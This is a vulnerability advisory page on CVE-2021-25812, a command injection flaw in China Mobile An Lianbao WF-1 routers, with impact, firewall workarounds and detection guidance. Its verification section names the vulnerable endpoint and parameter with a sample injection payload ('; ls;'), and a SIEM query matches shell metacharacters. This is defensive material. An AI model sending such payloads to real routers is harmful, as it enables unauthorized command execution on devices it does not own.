CVE-2021-25812 – This CVE describes a command injection vulnerab... (How to Fix)

Q: What is the severity of CVE-2021-25812?

CVE-2021-25812 has a CVSS score of 9.8 (CRITICAL). This CVE describes a command injection vulnerability in China Mobile An Lianbao WF-1 routers. Attackers can execute arbitrary commands on the device by sending specially crafted POST requests to the /api/ZRQos/set_online_client endpoint with malicious input in the 'ip' parameter. This affects users of China Mobile An Lianbao WF-1 routers version 1.01.

📋 TL;DR

This CVE describes a command injection vulnerability in China Mobile An Lianbao WF-1 routers. Attackers can execute arbitrary commands on the device by sending specially crafted POST requests to the /api/ZRQos/set_online_client endpoint with malicious input in the 'ip' parameter. This affects users of China Mobile An Lianbao WF-1 routers version 1.01.

💻 Affected Systems

Products:

China Mobile An Lianbao WF-1 router

Versions: 1.01

Operating Systems: Embedded Linux (router firmware)

Default Config Vulnerable: ⚠️ Yes

Notes: The vulnerability exists in the default configuration of the router's web management interface.

📦 What is this software?

An Lianbao Wf 1 Firmware by Chinamobile

View all CVEs affecting An Lianbao Wf 1 Firmware →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete compromise of the router allowing attackers to intercept all network traffic, install persistent backdoors, pivot to internal networks, and potentially brick the device.

🟠

Likely Case

Attackers gain remote code execution on the router, enabling them to modify network configurations, intercept sensitive data, and use the device as a foothold for further attacks.

🟢

If Mitigated

If network segmentation and proper access controls are implemented, impact is limited to the router itself without allowing lateral movement to other systems.

🌐 Internet-Facing: HIGH - The vulnerable endpoint is accessible via POST requests, making internet-exposed routers immediately vulnerable to remote exploitation.

🏢 Internal Only: MEDIUM - Internal attackers with network access can exploit this vulnerability, though it requires reaching the router's management interface.

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Public proof-of-concept code is available on GitHub, demonstrating simple command injection via the 'ip' parameter. No authentication is required to exploit this vulnerability.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: http://iot.10086.cn/?l=en-us

Restart Required: No

Instructions:

No official patch is currently available. Monitor the vendor's IoT security portal for updates and firmware releases.

🔧 Temporary Workarounds

Network Access Control

linux

Restrict access to the router's management interface using firewall rules to only allow connections from trusted IP addresses.

iptables -A INPUT -p tcp --dport 80 -s TRUSTED_IP -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -s TRUSTED_IP -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j DROP
iptables -A INPUT -p tcp --dport 443 -j DROP

Disable Vulnerable Endpoint

all

If possible, disable or block access to the /api/ZRQos/set_online_client endpoint through web server configuration or application firewall rules.

🧯 If You Can't Patch

Replace vulnerable routers with secure alternatives from different vendors
Implement network segmentation to isolate the router from critical internal systems

🔍 How to Verify

Check if Vulnerable:

Send a POST request to http://[router_ip]/api/ZRQos/set_online_client with 'ip' parameter containing command injection payload (e.g., '; ls;'). Check if command output appears in response.

Check Version:

Check router web interface or use nmap to identify firmware version: nmap -sV -p 80,443 [router_ip]

Verify Fix Applied:

Test the same exploit attempt after applying workarounds - the command injection should no longer execute.

📡 Detection & Monitoring

Log Indicators:

POST requests to /api/ZRQos/set_online_client with unusual characters in 'ip' parameter
System logs showing unexpected command execution
Failed authentication attempts followed by API calls

Network Indicators:

Unusual outbound connections from router to external IPs
Traffic patterns indicating command and control communication
POST requests to router management interface from unexpected sources

SIEM Query:

source="router_logs" AND (url="/api/ZRQos/set_online_client" AND (param="ip" AND value MATCH "[;&|`$()]"))

📊 Metadata

CVE ID: CVE-2021-25812

CVSS v3 Score: 9.8 (CRITICAL)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-77

Published: April 29, 2021

Last Updated: November 21, 2024

🔗 References

http://iot.10086.cn/?l=en-us Product
https://github.com/pokerfacett/MY_REQUEST/blob/master/China%20Mobile%20An%20Lianbao%20WF-1%20router%20Command%20Injection.md Third Party Advisory
https://www.zhipinmall.com/prodetail?id=1266#skuId=3020 Third Party Advisory
http://iot.10086.cn/?l=en-us Product
https://github.com/pokerfacett/MY_REQUEST/blob/master/China%20Mobile%20An%20Lianbao%20WF-1%20router%20Command%20Injection.md Third Party Advisory
https://www.zhipinmall.com/prodetail?id=1266#skuId=3020 Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2021-25812, you might also want to check these: